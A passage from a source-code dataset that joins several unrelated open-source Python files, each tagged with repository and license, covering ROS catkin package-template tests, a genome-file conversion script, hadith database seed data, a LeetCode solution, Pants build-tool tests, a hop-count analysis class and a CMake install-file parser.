create_cmakelists, create_package_xml, PackageTemplate, _create_include_macro, \
_create_targetlib_args
from catkin_pkg.package import parse_package, Dependency, Export, Url, PACKAGE_MANIFEST_FILENAME
from catkin_pkg.python_setup import generate_distutils_setup
def u(str):
try:
return unicode(str)
except NameError:
return str
class TemplateTest(unittest.TestCase):
def get_maintainer(self):
maint = Mock()
maint.email = 'foo@bar.com'
maint.name = 'John Foo'
return maint
def test_safe_write_files(self):
file1 = os.path.join('foo', 'bar')
file2 = os.path.join('foo', 'baz')
newfiles = {file1: 'foobar', file2: 'barfoo'}
try:
rootdir = tempfile.mkdtemp()
_safe_write_files(newfiles, rootdir)
self.assertTrue(os.path.isfile(os.path.join(rootdir, file1)))
self.assertTrue(os.path.isfile(os.path.join(rootdir, file2)))
self.assertRaises(ValueError, _safe_write_files, newfiles, rootdir)
finally:
shutil.rmtree(rootdir)
def test_create_cmakelists(self):
mock_pack = MagicMock()
mock_pack.name = 'foo'
mock_pack.catkin_deps = []
result = create_cmakelists(mock_pack, 'groovy')
self.assertTrue('project(foo)' in result, result)
self.assertTrue('find_package(catkin REQUIRED)' in result, result)
mock_pack.catkin_deps = ['bar', 'baz']
result = create_cmakelists(mock_pack, 'groovy')
self.assertTrue('project(foo)' in result, result)
expected = """find_package(catkin REQUIRED COMPONENTS
bar
baz
)"""
self.assertTrue(expected in result, result)
def test_create_package_xml(self):
maint = self.get_maintainer()
pack = PackageTemplate(name='foo',
description='foo',
version='0.0.0',
maintainers=[maint],
licenses=['BSD'])
result = create_package_xml(pack, 'groovy')
self.assertTrue('<name>foo</name>' in result, result)
def test_create_targetlib_args(self):
mock_pack = MagicMock()
mock_pack.name = 'foo'
mock_pack.catkin_deps = []
mock_pack.boost_comps = []
mock_pack.system_deps = []
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n', statement)
mock_pack.catkin_deps = ['roscpp', 'rospy']
mock_pack.boost_comps = []
mock_pack.system_deps = []
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = ['thread', 'filesystem']
mock_pack.system_deps = []
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n# ${Boost_LIBRARIES}\n', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = []
mock_pack.system_deps = ['log4cxx', 'BZip2']
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n# ${log4cxx_LIBRARIES}\n# ${BZip2_LIBRARIES}\n', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = ['thread', 'filesystem']
mock_pack.system_deps = ['log4cxx', 'BZip2']
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n# ${Boost_LIBRARIES}\n# ${log4cxx_LIBRARIES}\n# ${BZip2_LIBRARIES}\n', statement)
def test_create_include_macro(self):
mock_pack = MagicMock()
mock_pack.name = 'foo'
mock_pack.catkin_deps = []
mock_pack.boost_comps = []
mock_pack.system_deps = []
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)', statement)
mock_pack.catkin_deps = ['roscpp', 'rospy']
mock_pack.boost_comps = []
mock_pack.system_deps = []
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n)', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = ['thread', 'filesystem']
mock_pack.system_deps = []
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${Boost_INCLUDE_DIRS}\n)', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = []
mock_pack.system_deps = ['log4cxx', 'BZip2']
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)\n# TODO: Check names of system library include directories (log4cxx, BZip2)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${log4cxx_INCLUDE_DIRS}\n ${BZip2_INCLUDE_DIRS}\n)', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = ['thread', 'filesystem']
mock_pack.system_deps = ['log4cxx', 'BZip2']
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)\n# TODO: Check names of system library include directories (log4cxx, BZip2)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${Boost_INCLUDE_DIRS}\n ${log4cxx_INCLUDE_DIRS}\n ${BZip2_INCLUDE_DIRS}\n)', statement)
def test_create_package(self):
maint = self.get_maintainer()
pack = PackageTemplate(name='bar',
description='bar',
package_format='1',
version='0.0.0',
version_abi='pabi',
maintainers=[maint],
licenses=['BSD'])
try:
rootdir = tempfile.mkdtemp()
file1 = os.path.join(rootdir, 'CMakeLists.txt')
file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME)
create_package_files(rootdir, pack, 'groovy', {file1: ''})
self.assertTrue(os.path.isfile(file1))
self.assertTrue(os.path.isfile(file2))
finally:
shutil.rmtree(rootdir)
def test_create_package_template(self):
template = PackageTemplate._create_package_template(
package_name='bar2',
catkin_deps=['dep1', 'dep2'])
self.assertEqual('dep1', template.build_depends[0].name)
self.assertEqual('dep2', template.build_depends[1].name)
def test_parse_generated(self):
maint = self.get_maintainer()
pack = PackageTemplate(name='bar',
package_format=1,
version='0.0.0',
version_abi='pabi',
urls=[Url('foo')],
description='pdesc',
maintainers=[maint],
licenses=['BSD'])
try:
rootdir = tempfile.mkdtemp()
file1 = os.path.join(rootdir, 'CMakeLists.txt')
file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME)
create_package_files(rootdir, pack, 'groovy')
self.assertTrue(os.path.isfile(file1))
self.assertTrue(os.path.isfile(file2))
pack_result = parse_package(file2)
self.assertEqual(pack.name, pack_result.name)
self.assertEqual(pack.package_format, pack_result.package_format)
self.assertEqual(pack.version, pack_result.version)
self.assertEqual(pack.version_abi, pack_result.version_abi)
self.assertEqual(pack.description, pack_result.description)
self.assertEqual(pack.maintainers[0].name, pack_result.maintainers[0].name)
self.assertEqual(pack.maintainers[0].email, pack_result.maintainers[0].email)
self.assertEqual(pack.authors, pack_result.authors)
self.assertEqual(pack.urls[0].url, pack_result.urls[0].url)
self.assertEqual('website', pack_result.urls[0].type)
self.assertEqual(pack.licenses, pack_result.licenses)
self.assertEqual(pack.build_depends, pack_result.build_depends)
self.assertEqual(pack.buildtool_depends, pack_result.buildtool_depends)
self.assertEqual(pack.run_depends, pack_result.run_depends)
self.assertEqual(pack.test_depends, pack_result.test_depends)
self.assertEqual(pack.conflicts, pack_result.conflicts)
self.assertEqual(pack.replaces, pack_result.replaces)
self.assertEqual(pack.exports, pack_result.exports)
rdict = generate_distutils_setup(package_xml_path=file2)
self.assertEqual({'name': 'bar',
'maintainer': u('John Foo'),
'maintainer_email': 'foo@bar.com',
'description': 'pdesc',
'license': 'BSD',
'version': '0.0.0',
'author': '',
'url': 'foo'}, rdict)
finally:
shutil.rmtree(rootdir)
def test_parse_generated_multi(self):
# test with multiple attributes filled
maint = self.get_maintainer()
pack = PackageTemplate(name='bar',
package_format=1,
version='0.0.0',
version_abi='pabi',
description='pdesc',
maintainers=[maint, maint],
authors=[maint, maint],
licenses=['BSD', 'MIT'],
urls=[Url('foo', 'bugtracker'), Url('bar')],
build_depends=[Dependency('dep1')],
buildtool_depends=[Dependency('dep2'),
Dependency('dep3')],
run_depends=[Dependency('dep4', version_lt='4')],
test_depends=[Dependency('dep5',
version_gt='4',
version_lt='4')],
conflicts=[Dependency('dep6')],
replaces=[Dependency('dep7'),
Dependency('dep8')],
exports=[Export('architecture_independent'),
Export('meta_package')])
def assertEqualDependencies(deplist1, deplist2):
if len(deplist1) != len(deplist1):
return False
for depx, depy in zip(deplist1, deplist2):
for attr in ['name', 'version_lt', 'version_lte',
'version_eq', 'version_gte', 'version_gt']:
if getattr(depx, attr) != getattr(depy, attr):
return False
return True
try:
rootdir = tempfile.mkdtemp()
file1 = os.path.join(rootdir, 'CMakeLists.txt')
file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME)
create_package_files(rootdir, pack, 'groovy')
self.assertTrue(os.path.isfile(file1))
self.assertTrue(os.path.isfile(file2))
pack_result = parse_package(file2)
self.assertEqual(pack.name, pack_result.name)
self.assertEqual(pack.package_format, pack_result.package_format)
self.assertEqual(pack.version, pack_result.version)
self.assertEqual(pack.version_abi, pack_result.version_abi)
self.assertEqual(pack.description, pack_result.description)
self.assertEqual(len(pack.maintainers), len(pack_result.maintainers))
self.assertEqual(len(pack.authors), len(pack_result.authors))
self.assertEqual(len(pack.urls), len(pack_result.urls))
self.assertEqual(pack.urls[0].url, pack_result.urls[0].url)
self.assertEqual(pack.urls[0].type, pack_result.urls[0].type)
self.assertEqual(pack.licenses, pack_result.licenses)
self.assertTrue(assertEqualDependencies(pack.build_depends,
pack_result.build_depends))
self.assertTrue(assertEqualDependencies(pack.build_depends,
pack_result.build_depends))
self.assertTrue(assertEqualDependencies(pack.buildtool_depends,
pack_result.buildtool_depends))
self.assertTrue(assertEqualDependencies(pack.run_depends,
pack_result.run_depends))
self.assertTrue(assertEqualDependencies(pack.test_depends,
pack_result.test_depends))
self.assertTrue(assertEqualDependencies(pack.conflicts,
pack_result.conflicts))
self.assertTrue(assertEqualDependencies(pack.replaces,
pack_result.replaces))
self.assertEqual(pack.exports[0].tagname, pack_result.exports[0].tagname)
self.assertEqual(pack.exports[1].tagname, pack_result.exports[1].tagname)
rdict = generate_distutils_setup(package_xml_path=file2)
self.assertEqual({'name': 'bar',
'maintainer': u('John Foo <foo@bar.com>, John Foo <foo@bar.com>'),
'description': 'pdesc',
'license': 'BSD, MIT',
'version': '0.0.0',
'author': u('John Foo <foo@bar.com>, John Foo <foo@bar.com>'),
'url': 'bar'}, rdict)
finally:
shutil.rmtree(rootdir)
|
ipa-mdl/catkin_pkg
|
test/test_templates.py
|
Python
|
bsd-3-clause
| 14,395 | 0.001389 |
#!/usr/bin/env python
# encoding: utf-8
import glob
import os
import subprocess
'''
Convert 23andMe files to
PLINK format
'''
def twenty3_and_me_files():
"""Return the opensnp files that are 23 and me format"""
all_twenty3_and_me_files= glob.glob('../opensnp_datadump.current/*.23andme.txt')
fifteen_mb = 15 * 1000 * 1000
non_junk_files = [path for path in all_twenty3_and_me_files if os.path.getsize(path) > fifteen_mb]
return non_junk_files
def run_plink_format(usable_files):
"""Reformat the 23andMe files into plink binary stuff"""
for f in usable_files:
gid = f.split("/")[-1].split("_")[1].replace("file","")
call = "../plink_v190/plink --23file "+ f + " F" + gid + "ID" + gid + "I 1"
call += " --out ../plink_binaries/" + gid
print "convert gid " + gid
subprocess.call(call,shell=True)
usable_files = twenty3_and_me_files()
run_plink_format(usable_files)
|
ciyer/opensnp-fun
|
run_plink_reformat.py
|
Python
|
mit
| 886 | 0.023702 |
# -*- coding: utf-8 -*-
"""
Contains data that initially get added to the database to bootstrap it.
"""
from __future__ import unicode_literals
# pylint: disable=invalid-name
prophet_muhammad = {
'title': u'Prophet',
'display_name': u'النبي محمد (صلى الله عليه وآله وسلم)'.strip(),
'full_name': u'محمد بن عبد الله بن عبد المطلب بن هاشم'.strip(),
'brief_desc': u'نبي الإسلام، عليه وعلى آله الصلاة والسلام'.strip(),
'birth_year': 570,
'death_year': 632
}
imam_alsadiq = {
'title': u'Imam',
'display_name': u'الإمام الصادق (عليه السلام)',
'full_name': u"جعفر بن محمد الصادق",
'brief_desc': u'إمام من أئمة المسلمين وسادس أئمة الشيعة الاثنى عشرية'
}
# pylint: disable=line-too-long
first_shia_hadith_text = u'''
نضر الله عبدا سمع مقالتي فوعاها وحفظها وبلغها من لم يسمعها، فرب حامل فقه غير فقيه ورب حامل فقه إلى من هو أفقه منه، ثلاث لا يغل عليهن قلب امرئ مسلم: إخلاص العمل لله، والنصحية لائمة المسلمين، واللزوم لجماعتهم، فإن دعوتهم محيطة من ورائهم، المسلمون إخوة تتكافى دماؤهم ويسعى بذمتهم أدناهم.
'''.strip()
first_sunni_hadith_text = u'''
نضر الله عبدا سمع مقالتي فحفظها ووعاها واداها ، فرب حامل فقه غير فقيه ، ورب حامل فقه الى من هو افقه منه ، ثلاث لا يغل عليهن قلب مسلم : اخلاص العمل لله ، والنصيحة للمسلمين ، ولزوم جماعتهم ، فان دعوتهم تحيط من ورايهم
'''.strip()
# pylint: enable=line-too-long
shia_first_hadith_persons = [
u"عبد الله بن أبي يعفور العبدي".strip(),
u"ابان بن عثمان الأحمر البجلي".strip(),
u"احمد بن محمد بن عمرو بن ابي نصر البزنطي".strip(),
u"احمد بن عيسى".strip()]
sunni_first_hadith_persons = [
u"عبد الله بن مسعود".strip(),
u"عبد الرحمن بن عبد الله الهذلي".strip(),
u"عبد الملك بن عمير اللخمي".strip(),
u"سفيان بن عيينة الهلالي".strip(),
]
holy_quran = u"القرآن الكريم"
holy_quran_suras = [
u"الفاتحة",
u"البقرة",
u"آل عمران",
u"النساء",
u"المائدة",
u"اﻷنعام",
u"اﻷعراف",
u"اﻷنفال",
u"التوبة",
u"يونس",
u"هود",
u"يوسف",
u"الرعد",
u"إبراهيم",
u"الحجر",
u"النحل",
u"اﻹسراء",
u"الكهف",
u"مريم",
u"طه",
u"اﻷنبياء",
u"الحج",
u"المؤمنون",
u"النور",
u"الفرقان",
u"الشعراء",
u"النمل",
u"القصص",
u"العنكبوت",
u"الروم",
u"لقمان",
u"السجدة",
u"اﻷحزاب",
u"سبأ",
u"فاطر",
u"يس",
u"الصافات",
u"ص",
u"الزمر",
u"غافر",
u"فصلت",
u"الشورى",
u"الزخرف",
u"الدخان",
u"الجاثية",
u"اﻷحقاف",
u"محمد",
u"الفتح",
u"الحجرات",
u"ق",
u"الذاريات",
u"الطور",
u"النجم",
u"القمر",
u"الرحمن",
u"الواقعة",
u"الحديد",
u"المجادلة",
u"الحشر",
u"الممتحنة",
u"الصف",
u"الجمعة",
u"المنافقون",
u"التغابن",
u"الطلاق",
u"التحريم",
u"الملك",
u"القلم",
u"الحاقة",
u"المعارج",
u"نوح",
u"الجن",
u"المزمل",
u"المدثر",
u"القيامة",
u"اﻹنسان",
u"المرسلات",
u"النبأ",
u"النازعات",
u"عبس",
u"التكوير",
u"الانفطار",
u"المطففين",
u"الانشقاق",
u"البروج",
u"الطارق",
u"اﻷعلى",
u"الغاشية",
u"الفجر",
u"البلد",
u"الشمس",
u"الليل",
u"الضحى",
u"الشرح",
u"التين",
u"العلق",
u"القدر",
u"البينة",
u"الزلزلة",
u"العاديات",
u"القارعة",
u"التكاثر",
u"العصر",
u"الهمزة",
u"الفيل",
u"قريش",
u"الماعون",
u"الكوثر",
u"الكافرون",
u"النصر",
u"المسد",
u"اﻹخلاص",
u"الفلق",
u"الناس"]
# كتاب الكافي، باب ما امر النبي صلى الله عليه وآله بالنصيحة لائمة
# المسلمين واللزوم لجماعتهم ومن هم؟
# http://www.mezan.net/books/kafi/kafi1/html/ara/books/al-kafi-1/166.html
shia_first_hadith_book = u"الكافي"
# مسند الشافعي، حديث 1105
# https://library.islamweb.net/hadith/display_hbook.php?bk_no=51&hid=1105&pid=
sunni_first_hadith_book = u"مسند الشافعي"
first_hadith_tag = u'علم الحديث'
|
hadithhouse/hadithhouse
|
hadiths/initial_data.py
|
Python
|
mit
| 5,391 | 0.000518 |
class Solution(object):
def checkPossibility(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
n = len(nums)
t = 0
for i in xrange(n-1):
if nums[i] > nums[i+1]:
if i-1 < 0 or i+2 > n-1:
t += 1
elif nums[i-1] <= nums[i+1]:
t += 1
elif nums[i+2] >= nums[i]:
t += 1
else:
return False
return True if t <= 1 else False
|
daohu527/leetcode_learning
|
665. Non-decreasing Array/code.py
|
Python
|
gpl-3.0
| 554 | 0.001805 |
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from abc import ABCMeta, abstractmethod
from pathlib import PurePath
from textwrap import dedent
from typing import List, Tuple, Type
from unittest.mock import Mock
import pytest
from pants.base.exceptions import ResolveError
from pants.build_graph.address import Address
from pants.engine.fs import (
EMPTY_DIRECTORY_DIGEST,
Digest,
FileContent,
InputFilesContent,
Workspace,
)
from pants.engine.interactive_runner import InteractiveProcessRequest, InteractiveRunner
from pants.engine.legacy.graph import HydratedTargetsWithOrigins, HydratedTargetWithOrigin
from pants.engine.legacy.structs import TargetAdaptorWithOrigin
from pants.engine.rules import UnionMembership
from pants.rules.core.fmt_test import FmtTest
from pants.rules.core.test import (
AddressAndTestResult,
CoverageDataBatch,
CoverageReport,
FilesystemCoverageReport,
Status,
Test,
TestDebugRequest,
TestResult,
TestRunner,
WrappedTestRunner,
run_tests,
)
from pants.testutil.engine.util import MockConsole, MockGet, run_rule
from pants.testutil.test_base import TestBase
from pants.util.ordered_set import OrderedSet
# TODO(#9141): replace this with a proper util to create `GoalSubsystem`s
class MockOptions:
def __init__(self, **values):
self.values = Mock(**values)
class MockTestRunner(TestRunner, metaclass=ABCMeta):
@staticmethod
def is_valid_target(_: TargetAdaptorWithOrigin) -> bool:
return True
@staticmethod
@abstractmethod
def status(_: Address) -> Status:
pass
@staticmethod
def stdout(_: Address) -> str:
return ""
@staticmethod
def stderr(_: Address) -> str:
return ""
@property
def test_result(self) -> TestResult:
address = self.adaptor_with_origin.adaptor.address
return TestResult(self.status(address), self.stdout(address), self.stderr(address))
class SuccessfulTestRunner(MockTestRunner):
@staticmethod
def status(_: Address) -> Status:
return Status.SUCCESS
@staticmethod
def stdout(address: Address) -> str:
return f"Successful test runner: Passed for {address}!"
class ConditionallySucceedsTestRunner(MockTestRunner):
@staticmethod
def status(address: Address) -> Status:
return Status.FAILURE if address.target_name == "bad" else Status.SUCCESS
@staticmethod
def stdout(address: Address) -> str:
return (
f"Conditionally succeeds test runner: Passed for {address}!"
if address.target_name != "bad"
else ""
)
@staticmethod
def stderr(address: Address) -> str:
return (
f"Conditionally succeeds test runner: Had an issue for {address}! Oh no!"
if address.target_name == "bad"
else ""
)
class InvalidTargetTestRunner(MockTestRunner):
@staticmethod
def is_valid_target(_: TargetAdaptorWithOrigin) -> bool:
return False
@staticmethod
def status(_: Address) -> Status:
return Status.FAILURE
class TestTest(TestBase):
def make_ipr(self) -> InteractiveProcessRequest:
input_files_content = InputFilesContent(
(FileContent(path="program.py", content=b"def test(): pass"),)
)
digest = self.request_single_product(Digest, input_files_content)
return InteractiveProcessRequest(
argv=("/usr/bin/python", "program.py",), run_in_workspace=False, input_files=digest,
)
def run_test_rule(
self,
*,
test_runner: Type[TestRunner],
targets: List[HydratedTargetWithOrigin],
debug: bool = False,
) -> Tuple[int, str]:
console = MockConsole(use_colors=False)
options = MockOptions(debug=debug, run_coverage=False)
interactive_runner = InteractiveRunner(self.scheduler)
workspace = Workspace(self.scheduler)
union_membership = UnionMembership({TestRunner: OrderedSet([test_runner])})
def mock_coordinator_of_tests(
wrapped_test_runner: WrappedTestRunner,
) -> AddressAndTestResult:
runner = wrapped_test_runner.runner
return AddressAndTestResult(
address=runner.adaptor_with_origin.adaptor.address,
test_result=runner.test_result, # type: ignore[attr-defined]
)
result: Test = run_rule(
run_tests,
rule_args=[
console,
options,
interactive_runner,
HydratedTargetsWithOrigins(targets),
workspace,
union_membership,
],
mock_gets=[
MockGet(
product_type=AddressAndTestResult,
subject_type=WrappedTestRunner,
mock=lambda wrapped_test_runner: mock_coordinator_of_tests(wrapped_test_runner),
),
MockGet(
product_type=TestDebugRequest,
subject_type=TestRunner,
mock=lambda _: TestDebugRequest(self.make_ipr()),
),
MockGet(
product_type=CoverageReport,
subject_type=CoverageDataBatch,
mock=lambda _: FilesystemCoverageReport(
result_digest=EMPTY_DIRECTORY_DIGEST,
directory_to_materialize_to=PurePath("mockety/mock"),
),
),
],
union_membership=union_membership,
)
return result.exit_code, console.stdout.getvalue()
def test_empty_target_noops(self) -> None:
exit_code, stdout = self.run_test_rule(
test_runner=SuccessfulTestRunner,
targets=[FmtTest.make_hydrated_target_with_origin(include_sources=False)],
)
assert exit_code == 0
assert stdout.strip() == ""
def test_invalid_target_noops(self) -> None:
exit_code, stdout = self.run_test_rule(
test_runner=InvalidTargetTestRunner,
targets=[FmtTest.make_hydrated_target_with_origin()],
)
assert exit_code == 0
assert stdout.strip() == ""
def test_single_target(self) -> None:
target_with_origin = FmtTest.make_hydrated_target_with_origin()
address = target_with_origin.target.adaptor.address
exit_code, stdout = self.run_test_rule(
test_runner=SuccessfulTestRunner, targets=[target_with_origin],
)
assert exit_code == 0
assert stdout == dedent(
f"""\
{address} stdout:
{SuccessfulTestRunner.stdout(address)}
{address} ..... SUCCESS
"""
)
def test_multiple_targets(self) -> None:
good_target = FmtTest.make_hydrated_target_with_origin(name="good")
good_address = good_target.target.adaptor.address
bad_target = FmtTest.make_hydrated_target_with_origin(name="bad")
bad_address = bad_target.target.adaptor.address
exit_code, stdout = self.run_test_rule(
test_runner=ConditionallySucceedsTestRunner, targets=[good_target, bad_target],
)
assert exit_code == 1
assert stdout == dedent(
f"""\
{good_address} stdout:
{ConditionallySucceedsTestRunner.stdout(good_address)}
{bad_address} stderr:
{ConditionallySucceedsTestRunner.stderr(bad_address)}
{good_address} ..... SUCCESS
{bad_address} ..... FAILURE
"""
)
def test_single_debug_target(self) -> None:
exit_code, stdout = self.run_test_rule(
test_runner=SuccessfulTestRunner,
targets=[FmtTest.make_hydrated_target_with_origin()],
debug=True,
)
assert exit_code == 0
def test_multiple_debug_targets_fail(self) -> None:
with pytest.raises(ResolveError):
self.run_test_rule(
test_runner=SuccessfulTestRunner,
targets=[
FmtTest.make_hydrated_target_with_origin(name="t1"),
FmtTest.make_hydrated_target_with_origin(name="t2"),
],
debug=True,
)
|
wisechengyi/pants
|
src/python/pants/rules/core/test_test.py
|
Python
|
apache-2.0
| 8,678 | 0.001498 |
#!/usr/bin/env python2.7
import logging
import numpy as np
from .analysis import Analysis
class HopCountAnalysis(Analysis):
def __init__(self, scenario, location, repetitions, csv):
Analysis.__init__(self, scenario, location, "hopCount", repetitions, csv)
self.logger = logging.getLogger('baltimore.analysis.HopCountAnalysis')
self.logger.debug('creating an instance of HopCountAnalysis for scenario %s', scenario)
self.data_min = {}
self.data_max = {}
self.data_median = {}
self.data_std = {}
self.data_avg = {}
def evaluate(self, experiment_results, is_verbose=False):
self.logger.info("running hop count analysis")
hop_count = {}
raw_data = []
for repetition in experiment_results:
nodes = experiment_results.nodes_have_metric("hopCount", repetition)
for node in nodes:
data = experiment_results.get_tuple_metric_per_node("hopCount", node, repetition)
for element in data:
raw_data.append([repetition, node, float(element[0]), int(element[1])])
if node not in hop_count:
hop_count[node] = []
hop_count[node].append(raw_data)
raw_data = []
for node, data in list(hop_count.items()):
hop_count_data = [element[3] for repetition in data for element in repetition]
self.data_min[node] = np.amin(hop_count_data)
self.data_max[node] = np.amax(hop_count_data)
self.data_median[node] = np.median(hop_count_data)
self.data_std[node] = np.std(hop_count_data)
self.data_avg[node] = np.average(hop_count_data)
self.logger.info("Printing hop count statistics for node %s", node)
self.logger.info("Minimum hop count = %f nodes", self.data_min[node])
self.logger.info("Maximum hop count = %f nodes", self.data_max[node])
self.logger.info("Std.Deviation = %f nodes", self.data_std[node])
self.logger.info("Average hop count = %f nodes", self.data_avg[node])
self.logger.info("Median hop count = %f nodes", self.data_median[node])
if self.draw:
for node in hop_count:
self.metric = "hop_count_node-" + str(node)
self.plot_boxplot("Average Hop Count (Node " + str(node) + ")", "Repetition", "Hop Count [ms]", self.data_avg[node])
if self.csv:
self.export_csv()
self.export_csv_raw(hop_count)
def export_csv(self):
self.metric = "hopCount"
file_name = self.scenario + "_" + self.metric + "_aggregated.csv"
disclaimer = [['#'],['#'], ['# ' + str(self.date) + ' - hop count for scenario ' + self.scenario],['# aggregated over ' + str(self.repetitions) + ' repetitions'],['#']]
header = ['node', 'min', 'max', 'median', 'std', 'avg']
data = []
for node in self.data_min:
data.append([node, self.data_min[node], self.data_max[node], self.data_median[node], self.data_std[node], self.data_avg[node]])
self._write_csv_file(file_name, disclaimer, header, data)
def export_csv_raw(self, raw_data):
self.metric = "hopCount"
file_name = self.scenario + "_" + self.metric + ".csv"
disclaimer = [['#'],['#'], ['# ' + str(self.date) + ' - hop count for scenario ' + self.scenario],['#']]
header = ['node', 'repetition', 'timestamp', 'hop count']
data = []
for node, hop_counts in list(raw_data.items()):
for values in hop_counts:
for element in values:
data.append([node, element[0], element[2], element[3]])
self._write_csv_file(file_name, disclaimer, header, data)
|
mfrey/baltimore
|
analysis/hopcountanalysis.py
|
Python
|
gpl-3.0
| 3,831 | 0.006004 |
#!env python
# Copyright 2008 Simon Edwards <simon@simonzone.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import re
import os.path
import glob
import kbindinggenerator.cmakeparser as cmakeparser
def ExtractInstallFiles(filename=None,input=None,variables=None):
if variables is None:
variables = {}
else:
variables = variables.copy()
install_list = []
if filename is not None:
variables['cmake_current_source_dir'] = [os.path.dirname(filename)]
ExtractInstallFilesWithContext(variables, install_list, filename,input)
# print(repr(variables))
# print(repr(install_list))
return install_list
def ExtractInstallFilesWithContext(variables, install_list, filename=None, input=None, fileprefix=""):
inputstring = ""
currentdir = ""
if input:
inputstring = input
elif filename:
currentdir = os.path.dirname(filename)
fhandle = open(filename)
inputstring= fhandle.read()
fhandle.close()
parser = cmakeparser.CMakeParser()
command_list = parser.parse(inputstring, filename)
include_dirs = []
for commandobject in command_list:
command = commandobject.command().lower()
args = [arg.value() for arg in commandobject.arguments()]
if command=="set":
variables[args[0].lower()] = ExpandArgs(variables, args[1:], filename)
elif command=="install":
install_args = ExpandArgs(variables, args, filename)
for arg in install_args:
if arg.endswith('.h'):
for basepath in [currentdir, fileprefix] + include_dirs:
fullpath = os.path.join(basepath, arg)
# print(fullpath)
if os.path.exists(fullpath):
install_list.append(fullpath)
break
else:
fullpath = os.path.join(currentdir, basepath, arg)
if os.path.exists(fullpath):
install_list.append(fullpath)
break
else:
print("Unable to find header file " + arg)
elif command=="include":
if filename is not None:
command_args = ExpandArgs(variables, args, filename)
this_dir = os.path.dirname(filename)
for arg in command_args:
if len(arg.strip())!=0:
include_filename = os.path.join(this_dir,arg)
if os.path.exists(include_filename):
ExtractInstallFilesWithContext(variables, install_list, include_filename)
elif command=="add_subdirectory":
if filename is not None:
command_args = ExpandArgs(variables, args, filename)
this_dir = os.path.dirname(filename)
for arg in command_args:
if len(arg.strip())!=0:
include_filename = os.path.join(this_dir,arg,"CMakeLists.txt")
if os.path.exists(include_filename):
ExtractInstallFilesWithContext(variables, install_list, include_filename, fileprefix=os.path.join(fileprefix,arg))
elif command=="file":
# This is just a basic cmake FILE() implementation. It just does GLOB.
command_args = ExpandArgs(variables, args, filename)
varname = None
result = None
try:
it = iter(command_args)
arg = it.__next__()
if arg.lower()=='glob' and filename is not None:
arg = it.next()
varname = arg
arg = it.next()
relative_dir = os.path.dirname(filename)
if arg.lower()=='relative':
arg = it.next()
relative_dir = arg
arg = it.next()
if not relative_dir.endswith('/'):
relative_dir += '/'
result = []
current_dir = variables['cmake_current_source_dir'][0]
while True:
for x in glob.iglob(os.path.join(current_dir, arg)):
if x.startswith(relative_dir):
x = x[len(relative_dir):]
result.append(x)
arg = it.next()
except StopIteration:
if varname is not None and result is not None:
variables[varname.lower()] = result
elif command=="ecm_generate_headers":
header_args = ExpandArgs(variables, args, filename)
# print("ecm_generate_headers:"+repr(header_args))
prefix=""
if "RELATIVE" in header_args:
prefix = header_args[header_args.index("RELATIVE")+1]
for item in header_args:
if item == "REQUIRED_HEADERS" or item == "RELATIVE":
break
headername = os.path.join(currentdir, prefix, item.lower() + ".h")
if os.path.exists(headername):
install_list.append(headername)
elif command == "target_include_directories":
include_args = ExpandArgs(variables, args, filename)
if "PUBLIC" in include_args:
for item in include_args[include_args.index("PUBLIC")+1:]:
include_dirs.append(item)
#print("include dirs:",repr(include_dirs))
def ExpandArgs(variables, args, filename=None):
rex = re.compile(r'(\$\{[^\}]+\})')
fixed_args = []
for arg in args:
fixed_parts = []
if arg.startswith("$<BUILD_INTERFACE:"):
arg = arg[len("$<BUILD_INTERFACE:"): -1]
parts = rex.split(arg)
for part in parts:
if part.startswith("${"):
name = part[2:-1].lower()
if name in variables:
value = variables[name]
if len(value)==1:
fixed_parts.append(variables[name][0])
else:
fixed_args.extend(value)
else:
print("Undefined cmake variable '" + name + "' in " + filename)
else:
fixed_parts.append(part)
fixed_args.append(''.join(fixed_parts))
return fixed_args
def __FetchCommands(lexer):
topmode = True
command_list = []
command = None
args = []
tok = lexer.token()
while 1:
if not tok:
if command:
command_list.append( (command,args) )
break # No more input
if topmode:
if tok.type=="COMMAND":
command = tok.value
topmode = False
else:
print("Fail")
# Fail
tok = lexer.token()
else:
# Grab arguments
if tok.type=="COMMAND":
if command:
command_list.append( (command,args) )
command = None
args = []
topmode = True
continue
args.append(tok.value)
tok = lexer.token()
return command_list
if __name__=="__main__":
#print("Testing")
#lexer = cmakelexer.CMakeLexer()
